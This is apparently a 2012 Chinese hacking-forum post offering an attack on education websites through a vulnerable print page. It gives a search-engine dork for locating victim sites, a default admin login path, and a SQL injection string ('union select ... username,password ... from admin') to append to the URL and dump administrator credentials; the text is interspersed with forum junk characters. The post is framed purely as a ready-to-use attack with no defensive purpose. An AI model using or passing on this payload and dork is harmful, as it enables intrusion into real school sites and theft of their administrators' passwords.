找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1810|回复: 0
打印 上一主题 下一主题

某教育站打印页面漏洞批量webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-31 08:37:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
教育站打印页面漏洞; K( \6 x6 F2 l0 R3 E3 M0 k, }
百度或google搜索 inurl:info_Print.asp?ArticleID=
$ T% L) x  q  t3 z1 f9 {默认后台:/ad_login.asp$ ?. c- Q5 ^# G- k- \% r* F% ?7 P
爆管理员密码:' v- _  s9 z# h. S4 l' B
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
0 J- J6 @5 J; k1 d% \6 l( P% |# v. A4 I
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
- H/ c4 U4 E: P
' i: K. V9 p6 a. _: G作者:佚名
8 Q1 h- e, J- c2 I 5 e4 s& {# D9 j

* x9 I$ z0 l  }- v5 Z0 X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表